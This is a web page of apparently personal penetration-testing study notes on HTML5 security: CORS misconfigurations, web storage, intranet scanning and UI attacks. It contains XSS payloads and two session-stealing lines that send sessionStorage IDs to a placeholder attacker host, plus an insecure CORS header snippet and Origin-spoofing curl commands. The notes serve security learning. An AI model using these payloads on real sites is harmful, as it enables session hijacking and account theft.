<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.19.2 by Michael Rose
  Copyright 2013-2019 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->
<html lang="en" class="no-js">
  <head>
    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>6 - HTML5 |</title>
<meta name="description" content="How to exploit the new features of HTML5 ">


  <meta name="author" content="Nullified">


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="">
<meta property="og:title" content="6 - HTML5">
<meta property="og:url" content="http://localhost:4000/notes/ewptx/html5/">


  <meta property="og:description" content="How to exploit the new features of HTML5 ">



  <meta property="og:image" content="http://localhost:4000/assets/images/main/header2.jpg">





  <meta property="article:published_time" content="2023-11-30T00:00:00+06:00">





  

  


<link rel="canonical" href="http://localhost:4000/notes/ewptx/html5/">




<script type="application/ld+json">
  {
    "@context": "https://schema.org",
    
      "@type": "Person",
      "name": "john",
      "url": "http://localhost:4000/"
    
  }
</script>






<!-- end _includes/seo.html -->


<link href="/feed.xml" type="application/atom+xml" rel="alternate" title=" Feed">

<!-- https://t.co/dKP3o1e -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">

<!--[if IE]>
  <style>
    /* old IE unsupported flexbox fixes */
    .greedy-nav .site-title {
      padding-right: 3em;
    }
    .greedy-nav button {
      position: absolute;
      top: 0;
      right: 0;
      height: 100%;
    }
  </style>
<![endif]-->



    <!-- start custom head snippets -->

<!-- insert favicons. use https://realfavicongenerator.net/ -->

<!-- end custom head snippets -->

<!-- favicon -->
<link rel="icon" type="image/jpeg" sizes="32x32" href="/assets/images/main/fav-32x32.jpeg">
<link rel="icon" type="image/jpeg" sizes="16x16" href="/assets/images/main/fav-16x16.jpeg">
<meta name="theme-color" content="#ffffff">

  </head>

  <body class="layout--single single">
    <nav class="skip-links">
  <h2 class="screen-reader-text">Skip links</h2>
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Skip to primary navigation</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Skip to content</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Skip to footer</a></li>
  </ul>
</nav>

    <!--[if lt IE 9]>
<div class="notice--danger align-center" style="margin: 0;">You are using an <strong>outdated</strong> browser. Please <a href="https://browsehappy.com/">upgrade your browser</a> to improve your experience.</div>
<![endif]-->

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        
          <a class="site-logo" href="/"><img src="/assets/images/main/kaizen.png" alt=""></a>
        
        <a class="site-title" href="/">
          
          
        </a>
        <ul class="visible-links"><li class="masthead__menu-item">
              <a href="/">Posts</a>
            </li><li class="masthead__menu-item">
              <a href="/menu">Menu</a>
            </li><li class="masthead__menu-item">
              <a href="/about">About</a>
            </li></ul>
        
        <button class="search__toggle" type="button">
          <span class="visually-hidden">Toggle search</span>
          <svg class="icon" width="16" height="16" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 15.99 16">
            <path d="M15.5,13.12L13.19,10.8a1.69,1.69,0,0,0-1.28-.55l-0.06-.06A6.5,6.5,0,0,0,5.77,0,6.5,6.5,0,0,0,2.46,11.59a6.47,6.47,0,0,0,7.74.26l0.05,0.05a1.65,1.65,0,0,0,.5,1.24l2.38,2.38A1.68,1.68,0,0,0,15.5,13.12ZM6.4,2A4.41,4.41,0,1,1,2,6.4,4.43,4.43,0,0,1,6.4,2Z" transform="translate(-.01)"></path>
          </svg>
        </button>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Toggle menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>
  
    

    <div class="initial-content">
      
  







<div class="page__hero--overlay"
  style=" background-image: linear-gradient(rgba(0, 0, 0, 0.5), rgba(0, 0, 0, 0.5)), url('/assets/images/main/header2.jpg');"
>
  
    <div class="wrapper">
      <h1 id="page-title" class="page__title" itemprop="headline">
        
          6 - HTML5

        
      </h1>
      
        <p class="page__lead"><ol>
  <li>Understand the concept; 2. then Learn how to exploit; 3. Understand the security measures; 4. then Learn how to bypass!</li>
</ol>
</p>
      
      
        <p class="page__meta"><i class="far fa-clock" aria-hidden="true"></i> 




  16 minute read

</p>
      
      
      
    </div>
  
  
</div>





<div id="main" role="main">
  
  <div class="sidebar sticky">
  
  
    
      
      
      
      
    
    
      

<nav class="nav__list">
  
  <input id="ac-toc" name="accordion-toc" type="checkbox" />
  <label for="ac-toc">Toggle menu</label>
  <ul class="nav__items">
    
      <li>
        
          <span class="nav__sub-title">Posts</span>
        

        
        <ul>
          
            <li><a href="/insights/roadmap/">- How to become a Pentester (2024)</a></li>
          
            <li><a href="/awareness/awarenessdoc/">- Security Awareness</a></li>
          
            <li><a href="/c2/sliverbasics/">- Sliver C2 Basics</a></li>
          
            <li><a href="">────────────────</a></li>
          
        </ul>
        
      </li>
    
      <li>
        
          <span class="nav__sub-title">Notes</span>
        

        
        <ul>
          
            <li><a href="/notes/ejpt/">eJPT</a></li>
          
            <li><a href="">────────────────</a></li>
          
            <li><a href="/review/ecppt/">eCPPTv2</a></li>
          
            <li><a href="/notes/ecppt/systemsecurity/">- System Security</a></li>
          
            <li><a href="/notes/ecppt/networksecurity/">- Network Security</a></li>
          
            <li><a href="/notes/ecppt/powershell/">- Powershell</a></li>
          
            <li><a href="/notes/ecppt/linux/">- Linux Security</a></li>
          
            <li><a href="/notes/ecppt/webapp/">- Web App Security</a></li>
          
            <li><a href="/notes/ecppt/wifi/">- Wi-Fi Pentest</a></li>
          
            <li><a href="/notes/ecppt/ruby/">- Metasploit & Ruby</a></li>
          
            <li><a href="">────────────────</a></li>
          
            <li><a href="/review/pnpt/">PNPT</a></li>
          
            <li><a href="/notes/pnpt/peh/">- Practical Ethical Hacker</a></li>
          
            <li><a href="/notes/pnpt/osint/">- OSINT</a></li>
          
            <li><a href="/notes/pnpt/pentestexternal/">- External Pentest Playbook</a></li>
          
            <li><a href="/notes/pnpt/linuxprivesc/">- Linux Privesc</a></li>
          
            <li><a href="/notes/pnpt/winprivesc/">- Windows Privesc</a></li>
          
            <li><a href="/notes/pnpt/wpivoting/">- Movement, Pivoting and Persistence</a></li>
          
            <li><a href="">────────────────</a></li>
          
            <li><a href="/review/eewptx/">eWPTXv2</a></li>
          
            <li><a href="/notes/ewptx/encoding/">- Encoding & Filtering</a></li>
          
            <li><a href="/notes/ewptx/evasionbasics/">- Evasion Basics</a></li>
          
            <li><a href="/notes/ewptx/xss/">- Cross-site scripting (XSS)</a></li>
          
            <li><a href="/notes/ewptx/xssfilter/">- XSS Filter Evasion</a></li>
          
            <li><a href="/notes/ewptx/csrf/">- Cross-site request forgery (CSRF)</a></li>
          
            <li><a href="/notes/ewptx/html5/" class="active">- HTML5</a></li>
          
            <li><a href="/notes/ewptx/sqli/">- SQL Injection</a></li>
          
            <li><a href="/notes/ewptx/sqlievasion/">- SQLI Filter Evasion</a></li>
          
            <li><a href="/notes/ewptx/xmlattacks/">- XML Attacks</a></li>
          
            <li><a href="/notes/ewptx/zattackingserialization/">- Attacking Serialization</a></li>
          
            <li><a href="/notes/ewptx/serverside/">- Server Side Attacks</a></li>
          
            <li><a href="/notes/ewptx/crypto/">- Attacking Crypto</a></li>
          
            <li><a href="/notes/ewptx/authenticationsso/">- Authentication & SSO</a></li>
          
            <li><a href="/notes/ewptx/apiscloud/">- APIs & Cloud Apps</a></li>
          
            <li><a href="/notes/ewptx/ldap/">- Attacking LDAP</a></li>
          
            <li><a href="">────────────────</a></li>
          
            <li><a href="">Active Directory Exploitation</a></li>
          
            <li><a href="/notes/adx/powershell/">- Powershell</a></li>
          
            <li><a href="/notes/adx/bloodhound/">- Bloodhound</a></li>
          
            <li><a href="/notes/adx/privesc/">- Win Privesc</a></li>
          
            <li><a href="/notes/adx/zlateralmov/">- Lateral Movement</a></li>
          
            <li><a href="">────────────────</a></li>
          
            <li><a href="/review/crtp/">CRTP</a></li>
          
            <li><a href="/notes/crtp/enum/">- AD Enumeration</a></li>
          
            <li><a href="/notes/crtp/winprivesc/">- Local Privesc</a></li>
          
            <li><a href="/notes/crtp/latmov/">- Lateral Movement</a></li>
          
            <li><a href="/notes/crtp/offdotnet/">- Offensive .NET</a></li>
          
            <li><a href="/notes/crtp/domdom/">- AD Persistence</a></li>
          
            <li><a href="/notes/crtp/domprivesc/">- AD Privesc</a></li>
          
            <li><a href="/notes/crtp/defense/">- AD Defense</a></li>
          
            <li><a href="">────────────────</a></li>
          
            <li><a href="/review/crte/">CRTE</a></li>
          
            <li><a href="/notes/crte/latmov/">- Lateral Movement</a></li>
          
            <li><a href="/notes/crte/adprivesc/">- AD Privesc</a></li>
          
            <li><a href="/notes/crte/adpersistence/">- AD Persistence</a></li>
          
            <li><a href="/notes/crte/cross/">- Cross attacks</a></li>
          
            <li><a href="/notes/crte/cheatsheet/">- Cheat Sheet</a></li>
          
        </ul>
        
      </li>
    
      <li>
        
          <span class="nav__sub-title">My CVEs</span>
        

        
        <ul>
          
            <li><a href="/cve/xss/">CVE-2024-2479</a></li>
          
            <li><a href="/cve/sqli/">CVE-2024-2480</a></li>
          
        </ul>
        
      </li>
    
  </ul>
</nav>

    
  
  </div>



  <article class="page" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="6 - HTML5">
    <meta itemprop="description" content="  Understand the concept; 2. then Learn how to exploit; 3. Understand the security measures; 4. then Learn how to bypass!">
    <meta itemprop="datePublished" content="2023-11-30T00:00:00+06:00">
    

    <div class="page__inner-wrap">
      

      <section class="page__content" itemprop="text">
        
          <aside class="sidebar__right ">
            <nav class="toc">
              <header><h4 class="nav__title"><i class="fas fa-file-alt"></i> On this page</h4></header>
              <ul class="toc__menu">
  <li><a href="#htlm5">HTLM5</a>
    <ul>
      <li><a href="#intro">Intro</a></li>
      <li><a href="#web-storage--attack-scenarios">Web Storage – Attack Scenarios</a></li>
      <li><a href="#fullscreen-mode--attack-scenario">Fullscreen Mode – Attack Scenario</a></li>
      <li><a href="#performance-integration--connectivity">Performance, Integration &amp; Connectivity</a></li>
      <li><a href="#exploiting-html5">Exploiting HTML5</a></li>
      <li><a href="#storage-attacks-scenarios">Storage Attacks Scenarios</a></li>
      <li><a href="#web-messaging-attack-scenarios">Web Messaging Attack Scenarios</a></li>
      <li><a href="#web-sockets-attack-scenarios">Web Sockets Attack Scenarios</a></li>
      <li><a href="#web-workers-attack-scenarios">Web Workers Attack Scenarios</a></li>
      <li><a href="#security-measures">Security Measures</a></li>
      <li><a href="#ui-redressing---the-x-jacking-art">UI Redressing - The x-Jacking Art</a></li>
      <li><a href="#new-attack-vectors-in-html5">New Attack Vectors in HTML5</a></li>
    </ul>
  </li>
</ul>

            </nav>
          </aside>
        
        <script data-name="BMC-Widget" data-cfasync="false" src="https://cdnjs.buymeacoffee.com/1.0.0/widget.prod.min.js" data-id="nullified" data-description="Support me on Buy me a coffee!" data-message="" data-color="#FF813F" data-position="Right" data-x_margin="18" data-y_margin="18"></script>

<h1 id="htlm5">HTLM5</h1>

<h2 id="intro">Intro</h2>
<p>We do not need to analyze the entire HTML5 RFC and its related features; However, what we are going to explore in this Recap section is the major features that are interesting from a security perspective.</p>

<h3 id="semantics">Semantics</h3>
<p>Enrichment of the semantics that web devs can give to their apps. These include new media elements, form types, attributes, and many others. From security point of view, these become new attack vectors and ways to bypass security measures.</p>

<h3 id="form-elements">Form Elements</h3>
<p>The keygen element is one of the new Form Elements. It was introduced to generate a key-pair client side. The most interesting attribute it supports is autofocus. This is useful in <em>triggering XSS without user interaction</em>.</p>

<p>Example:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&lt;</span><span class="nx">form</span> <span class="nx">action</span><span class="o">=</span><span class="dl">"</span><span class="s2">#</span><span class="dl">"</span> <span class="nx">method</span> <span class="dl">"</span><span class="s2">GET</span><span class="dl">"</span><span class="o">&gt;</span>
  <span class="nx">Encryption</span><span class="p">:</span> <span class="o">&lt;</span><span class="nx">keygen</span> <span class="nx">name</span><span class="o">=</span><span class="dl">"</span><span class="s2">security</span><span class="dl">"</span> <span class="nx">autofocus</span> <span class="nx">onfocus</span><span class="o">=</span><span class="dl">"</span><span class="s2">alert(1);</span><span class="dl">"</span><span class="o">&gt;</span>
  <span class="o">&lt;</span><span class="nx">input</span> <span class="nx">type</span><span class="o">=</span><span class="dl">"</span><span class="s2">submit</span><span class="dl">"</span><span class="o">&gt;</span>
<span class="o">&lt;</span><span class="sr">/form</span><span class="err">&gt;
</span></code></pre></div></div>

<h3 id="media-elements">Media Elements</h3>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">#</span> <span class="nx">Both</span> <span class="o">&lt;</span><span class="nx">video</span><span class="o">&gt;</span> <span class="nx">and</span> <span class="o">&lt;</span><span class="nx">audio</span><span class="o">&gt;</span> <span class="nx">are</span> <span class="nx">commonly</span> <span class="nx">ysed</span> <span class="nx">to</span> <span class="nx">evade</span> <span class="nx">XSS</span> <span class="nx">filters</span><span class="p">.</span> <span class="nx">In</span> <span class="nx">addition</span><span class="p">,</span> <span class="o">&lt;</span><span class="nx">source</span><span class="o">&gt;</span><span class="p">,</span> <span class="o">&lt;</span><span class="nx">track</span><span class="o">&gt;</span> <span class="nx">and</span> <span class="o">&lt;</span><span class="nx">embed</span><span class="o">&gt;</span> <span class="nx">are</span> <span class="nx">also</span> <span class="nx">useful</span> <span class="nx">due</span> <span class="nx">to</span> <span class="nx">the</span> <span class="nx">fact</span> <span class="nx">that</span> <span class="nx">they</span> <span class="nx">support</span> <span class="nx">the</span> <span class="dl">'</span><span class="s1">src</span><span class="dl">'</span> <span class="nx">attribute</span>

<span class="err">#</span> <span class="nx">Example</span><span class="p">:</span>

<span class="o">&lt;</span><span class="nx">embed</span> <span class="nx">src</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://hacker.site/evil.swf</span><span class="dl">"</span><span class="o">&gt;</span>
<span class="o">&lt;</span><span class="nx">embed</span> <span class="nx">src</span><span class="o">=</span><span class="dl">"</span><span class="s2">javascript:alert(1)</span><span class="dl">"</span><span class="o">&gt;</span>
</code></pre></div></div>

<h3 id="semantic--structural-elements">Semantic / Structural Elements</h3>

<p>There are many other elements introduced to improve the semantic and the structure of a page, such as:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&lt;</span><span class="nx">article</span><span class="o">&gt;</span>
<span class="o">&lt;</span><span class="nx">figure</span><span class="o">&gt;</span>
<span class="o">&lt;</span><span class="nx">footer</span><span class="o">&gt;</span>
<span class="o">&lt;</span><span class="nx">header</span><span class="o">&gt;</span>
<span class="o">&lt;</span><span class="nx">main</span><span class="o">&gt;</span>
<span class="o">&lt;</span><span class="nx">mark</span><span class="o">&gt;</span>
<span class="o">&lt;</span><span class="nx">nav</span><span class="o">&gt;</span>
<span class="o">&lt;</span><span class="nx">progress</span><span class="o">&gt;</span>
<span class="o">&lt;</span><span class="nx">section</span><span class="o">&gt;</span>
<span class="o">&lt;</span><span class="nx">summary</span><span class="o">&gt;</span>
<span class="o">&lt;</span><span class="nx">time</span><span class="o">&gt;</span>
</code></pre></div></div>

<blockquote>
  <p>All of them support Global and Event Attributes, both old and new.</p>
</blockquote>

<h3 id="attributes">Attributes</h3>
<p>There is a huge list of new events and some interesting examples are:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">onhashchange</span>
<span class="nx">onformchange</span>
<span class="nx">onscroll</span>
<span class="nx">onresize</span>
<span class="p">...</span>
</code></pre></div></div>

<p>Example:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&lt;</span><span class="nx">body</span> <span class="nx">onhashchange</span><span class="o">=</span><span class="dl">"</span><span class="s2">alert(1)</span><span class="dl">"</span><span class="o">&gt;</span>
  <span class="o">&lt;</span><span class="nx">a</span> <span class="nx">href</span><span class="o">=</span><span class="dl">"</span><span class="s2">#</span><span class="dl">"</span><span class="o">&gt;</span> <span class="nx">Click</span> <span class="nx">me</span><span class="o">&lt;</span><span class="sr">/a</span><span class="err">&gt;
</span></code></pre></div></div>

<h3 id="offile--storage">Offile &amp; Storage</h3>
<p>A real world example is <em>TiddlyWiki</em>: http://tiddlywiki.com/</p>

<ul>
  <li>Some of the major features, related to this evolution are <strong>Application Cache</strong> and <strong>Web Storage</strong> (alias Client-Side Storage or Offile storage)</li>
</ul>

<h2 id="web-storage--attack-scenarios">Web Storage – Attack Scenarios</h2>
<p>The attack scenarios may vary from <strong>Session Hijacking, User Tracking, Disclosure of Confidential Data</strong>, as well as a new way to <strong>store attack vectors</strong>.</p>

<h3 id="session-hijacking">Session Hijacking</h3>
<p>If a dev chooses to store session IDs by using <strong>sessionStorage</strong> instead of cookies, its still possible to perform session hijacking by leveraging an XSS flaw.</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">new</span> <span class="nc">Image</span><span class="p">().</span><span class="nx">src</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://hacker.site/SID?</span><span class="dl">"</span><span class="o">+</span><span class="nf">escape</span><span class="p">(</span><span class="nx">sessionStorage</span><span class="p">.</span><span class="nf">getItem</span><span class="p">(</span><span class="dl">'</span><span class="s1">sessionID</span><span class="dl">'</span><span class="p">));</span>
<span class="c1">// usually was document.cookie</span>
</code></pre></div></div>

<p>Web storage solutions do not implement security mechanisms to mitigate the risk of malicious access to the stored information (see HttpOnly)</p>

<h3 id="offline-web-application--attack-scenarios">Offline Web Application – Attack Scenarios</h3>
<ul>
  <li>With Offline Web apps, the most critical security issue is <strong>Cache Poisoning</strong>.</li>
  <li>The offile apps can also cache SSL-resources and the root directory of a website.</li>
</ul>

<h3 id="device-access">Device Access</h3>
<p>A feature introduced by the HTML5 specs is <strong>Geolocation API</strong></p>

<p>→  http://www.w3.org/TR/geolocation-API/</p>

<blockquote>
  <p>This is a way to provide scripted access to identify a users positions based on GPS coordinates (lat and long)</p>
</blockquote>

<h3 id="geolocation--attack-scenarios">Geolocation – Attack Scenarios</h3>
<p>This API access can not only be used For <strong>user tracking</strong>, physical and cross-domain, but also For <strong>breaking anonymity</strong>.</p>

<h2 id="fullscreen-mode--attack-scenario">Fullscreen Mode – Attack Scenario</h2>
<p>Another API that allows a single element (images, videos, etc) to be viewed in full-screnn mode.</p>

<p>→ https://dvcs.w3.org/hg/fullscreen/raw-file/tip/Overview.html</p>

<ul>
  <li>This API can be used For <strong>Phishing Attacks</strong>.</li>
  <li>Example, sending a phishing page in full screen mode and loading a fake victim website in the background with a image that simulates the browser header, adress bar, etc.</li>
</ul>

<h2 id="performance-integration--connectivity">Performance, Integration &amp; Connectivity</h2>
<p>Many new features such as:</p>

<ul>
  <li><strong>Drag and Drop, HML editing and Workers</strong>( Web and Shared)
Improvements are also made on communications, with features such as:</li>
  <li><strong>WebSocket</strong> and <strong>XMLHttpRequest2</strong>.</li>
</ul>

<h3 id="attack-scenarios">Attack Scenarios</h3>
<p><strong>Interactive XSS</strong>, with Drag and Drop, to <strong>Remove Shell, port scanning</strong> and <strong>web-based botnets</strong> exploiting the new communication features like <em>WebSocket</em>.</p>

<ul>
  <li>Its also possible to manipulate the <strong>history</strong> stack with methods to add and remove locations, thus allowing <strong>history tampering</strong> attacks.</li>
</ul>

<p>Sec POV, the most important features introduced are:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Content</span> <span class="nx">Security</span> <span class="nx">Policy</span>
<span class="nx">Cross</span><span class="o">-</span><span class="nx">Origin</span> <span class="nx">Resource</span> <span class="nx">Sharing</span>
<span class="nx">Cross</span><span class="o">-</span><span class="nx">Document</span> <span class="nx">Messaging</span> 
<span class="nx">strengthening</span> <span class="k">of</span> <span class="nx">iframe</span> <span class="kd">with</span> <span class="nx">the</span> <span class="nx">Sandboxed</span> <span class="nx">attribute</span><span class="p">.</span>

<span class="o">-</span> <span class="nx">http</span><span class="p">:</span><span class="c1">//www.w3.org/TR/CSP/</span>
<span class="o">-</span> <span class="nx">http</span><span class="p">:</span><span class="c1">//www.w3.org/TR/cors/</span>
<span class="o">-</span> <span class="nx">https</span><span class="p">:</span><span class="c1">//html.spec.whatwg.org/multipage/web-messaging.html</span>
<span class="o">-</span> <span class="nx">http</span><span class="p">:</span><span class="c1">//www.w3.org/TR/html5/embedded-content-0.html#attr-iframe-sandbox</span>
</code></pre></div></div>

<h2 id="exploiting-html5">Exploiting HTML5</h2>
<p>Which may affect the most widespread technologies introduced by HTML5</p>

<h3 id="cors-attack-scenarios">CORS Attack Scenarios</h3>
<p>The same origin restrictions began to become more restrictive rather than helpful. In order to relax the SOP, a new specification has been introduced called: Cross-Origin Resource Sharing.</p>

<p>→ http://www.w3.org/TR/cors/</p>

<p>It uses a set of HTTP headers.</p>

<p>→ http://www.w3.org/TR/cors/#syntax</p>

<blockquote>
  <p>These allow both server and browser to communicate in relation to which requests are or not allowed.</p>
</blockquote>

<h4 id="universal-allow">Universal Allow</h4>
<p>The first CORS headers is <strong>Access-Control-Allow-Origin</strong>, which indicates whether a resource can be shared or not.</p>

<p>This is based upon it returning the value of the Origin request header, *, or null in the response:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Access</span><span class="o">-</span><span class="nx">Control</span><span class="o">-</span><span class="nx">Allow</span><span class="o">-</span><span class="nx">Origin</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Access-Control-Allow-Origin</span><span class="dl">"</span> <span class="dl">"</span><span class="s2">:</span><span class="dl">"</span> <span class="nx">origin</span><span class="o">-</span><span class="nx">list</span><span class="o">-</span><span class="nx">or</span><span class="o">-</span><span class="kc">null</span> <span class="o">|</span> <span class="dl">"</span><span class="s2">*</span><span class="dl">"</span>
</code></pre></div></div>

<h4 id="allow-by-wildcar-value-">Allow by Wildcar Value *</h4>
<p>Generally this is not a required behavior, but rather a matter of laziness of the implementer. This is one of the most common misconfigurations with CORS headers.</p>

<p>How to abuse?</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">-</span> <span class="nx">If</span> <span class="nx">XSS</span> <span class="nx">is</span> <span class="nx">found</span> <span class="nx">on</span> <span class="nx">the</span> <span class="nx">page</span> <span class="nx">served</span> <span class="kd">with</span> <span class="dl">'</span><span class="s1">Access-Control-Allow-Origin *</span><span class="dl">'</span><span class="p">,</span> <span class="nx">it</span> <span class="nx">can</span> <span class="nx">be</span> <span class="nx">used</span> <span class="nx">to</span> <span class="nx">infect</span> <span class="nx">or</span> <span class="nx">impersonate</span> <span class="nx">users</span><span class="p">.</span>
<span class="o">-</span> <span class="nx">Tricking</span> <span class="nx">users</span> <span class="nx">to</span> <span class="nx">access</span> <span class="nx">a</span> <span class="nx">controlled</span> <span class="nx">website</span> <span class="nx">and</span> <span class="nx">making</span> <span class="nx">a</span> <span class="nx">COR</span> <span class="nx">query</span> <span class="nx">to</span> <span class="nx">their</span> <span class="nx">internal</span> <span class="nx">resources</span> <span class="k">in</span> <span class="nx">order</span> <span class="nx">to</span> <span class="nx">read</span> <span class="nx">the</span> <span class="nx">responses</span><span class="p">.</span>
<span class="o">-</span> <span class="nx">Use</span> <span class="nx">the</span> <span class="nx">users</span> <span class="k">as</span> <span class="nx">a</span> <span class="nx">proxy</span> <span class="nx">to</span> <span class="nx">exploit</span> <span class="nx">vulnerabilities</span><span class="p">,</span> <span class="nx">therefore</span> <span class="nx">leveraging</span> <span class="nx">the</span> <span class="nx">fact</span> <span class="nx">that</span> <span class="nx">the</span> <span class="nx">HTTP</span> <span class="nx">Referrer</span> <span class="nx">header</span> <span class="nx">is</span> <span class="nx">often</span> <span class="nx">not</span> <span class="nx">logged</span><span class="p">.</span>
</code></pre></div></div>

<h4 id="universal-allow-1">Universal Allow</h4>
<p>In CORS, the <strong>Access-Control-Allow-Credentials</strong> indicates that the request can include user credentials. http://www.w3.org/TR/cors/#user-credentials</p>

<h4 id="allow-by-server-side">Allow by Server-side</h4>
<p>Allowing COR from all domains with credentials included:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>
<span class="nb">header</span><span class="p">(</span><span class="s1">'Access-Control-Allow-Origin: '</span><span class="o">+</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'HTTP_ORIGIN'</span><span class="p">]);</span>
<span class="nb">header</span><span class="p">(</span><span class="s1">'Access-Control-Allow-Credentials: true'</span><span class="p">);</span>
</code></pre></div></div>

<p>By design, this implementation allows CSRF.</p>

<blockquote>
  <p>Any origin will be able to read the anti-CSRF tokens from the page, therefore consenting any domain on the internet to impersonate the web application users.</p>
</blockquote>

<h3 id="weak-access-control">Weak Access Control</h3>
<p>CORS specifications provide a request header named <strong>Origin</strong>. It indicates where the COR or Preflight Request originates from.</p>

<ul>
  <li>The header can be spoofed by creating requests outside of the browsers. For example, one can use a proxy or using tool like cURL, Wget, etc.</li>
</ul>

<h4 id="check-origin-example">Check Origin Example</h4>
<p>Suppose that a victim.site supports CORS and, not only reveals sensitive information to friendly origins, but also reveals simple information to everyone.</p>

<p>By using CURL its possible to bypass the access control by setting the Origin header to the allowed value: friend.site.</p>

<p>In so doing, its possible to read the sensitive information sent:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://victim.site/html5/CORAaccessContro.php
<span class="c"># normal output</span>

curl <span class="nt">--header</span> <span class="s1">'Origin: http://hacker.site'</span> http://victim.site/...
<span class="c"># normal output</span>

curl <span class="nt">--header</span> <span class="s1">'Origin: http://friend.site'</span> http://victim.site/...
<span class="c"># sensitive information found</span>
</code></pre></div></div>

<h3 id="intranet-scanning">Intranet Scanning</h3>
<p>Its also possible to abuse COR in order to perform time-based intranet scanning.</p>

<ul>
  <li>Send XHR to either an arbritrary IP address or domain names and, depending on the response time, establish wheter a host is up or a specific port is open.</li>
</ul>

<h4 id="js-recon">JS-Recon</h4>
<p>Its a HTML5 based Javascript Network Reconnaissance tool</p>

<p>→ https://web.archive.org/web/20120313125925/http:/www.andlabs.org/tools/jsrecon/jsrecon.html</p>

<p>Which features like COR and Web Sockets in order to perform both network and port scanning from the browser.</p>

<blockquote>
  <p>Also useful to guessing users private IP addresses.</p>
</blockquote>

<h3 id="remote-web-shell">Remote Web Shell</h3>
<p>If an XSS flaw is found in an app that supports CORS, an attacker can hijack the victim session, establishing a communication channel between the victims browser and the attcker.</p>

<h4 id="the-shell-of-the-future">The Shell of the Future</h4>
<p>→ https://web.archive.org/web/20150223205517/http:/www.andlabs.org/tools/sotf/sotf.html</p>

<p>Its a Reverse Web Shell handler, it can be used to hijack sessions where JavaScript can be inject using XSS or through the browsers address bar. It makes use of HTML5 Cross Origin Requests and can bypass anti-session hijacking measures like Http-Only cookies and IP address-Session ID binding…</p>

<h2 id="storage-attacks-scenarios">Storage Attacks Scenarios</h2>
<p>→ https://tools.ietf.org/html/rfc6265#section-6.1</p>

<h3 id="web-storage">Web Storage</h3>
<p>Its the first stable HTML5 specification that rules two well known mechanisms: Session Storage and Local Storage.</p>

<p>The implementations are similar to cookies and they are also known as key-value storage and DOM storage. Anything can be converted to a string or serialized and stored:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">window</span><span class="p">.(</span><span class="nx">localStorage</span><span class="o">|</span><span class="nx">sessionStorage</span><span class="p">).</span><span class="nf">setItem</span><span class="p">(</span><span class="dl">'</span><span class="s1">name</span><span class="dl">'</span><span class="p">,</span><span class="dl">'</span><span class="s1">Joao</span><span class="dl">'</span><span class="p">);</span>
<span class="err">#</span>         <span class="nx">DOM</span> <span class="nx">properties</span>                       <span class="nx">Key</span>     <span class="nx">Value</span>
</code></pre></div></div>

<ul>
  <li>http://www.w3.org/TR/webstorage/#security-storage</li>
</ul>

<blockquote>
  <p>The main issue with this technology is that developers are not aware of the security concerns presented in this specification, which clearly reports the security risks this feature may introduce.</p>
</blockquote>

<h3 id="session-hijacking-1">Session Hijacking</h3>
<p>In the case of an XSS attack, Web Storage is a property of the Window object; therefore, its accessible via the DOM and, in a similar fashion to cookies, it can be compromised.</p>

<p>The exploitation is similar to the one used For cookies, but the only difference is in the API used to retrieve the values:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span> <span class="k">new</span> <span class="nx">Image</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">http://hacker.site/C.php?cc=</span><span class="dl">"</span> <span class="o">+</span><span class="nf">escape</span><span class="p">(</span><span class="nx">sessionStorage</span><span class="p">.</span><span class="nf">getItem</span><span class="p">(</span><span class="dl">'</span><span class="s1">sessionID</span><span class="dl">'</span><span class="p">));</span>
<span class="o">&lt;</span><span class="sr">/script</span><span class="err">&gt;
</span></code></pre></div></div>

<ul>
  <li>HTTP cookies have attributes, such as <strong>HTTPOnly</strong>, that were introduced to stop the session hijacking phenomena.</li>
  <li>This security measure, however, is completely missing For WebStorage technologies, making it completely inappropriate For storing both session identifiers and sensitive information</li>
</ul>

<h3 id="cross-directory-attacks">Cross-Directory Attacks</h3>
<p>Another important difference is that, unlike HTTP cookies, there is no feature to restrict the access by pathname, making the Web Storage content available in the whole origin. This may also introduce Cross-Directory attacks.</p>

<ul>
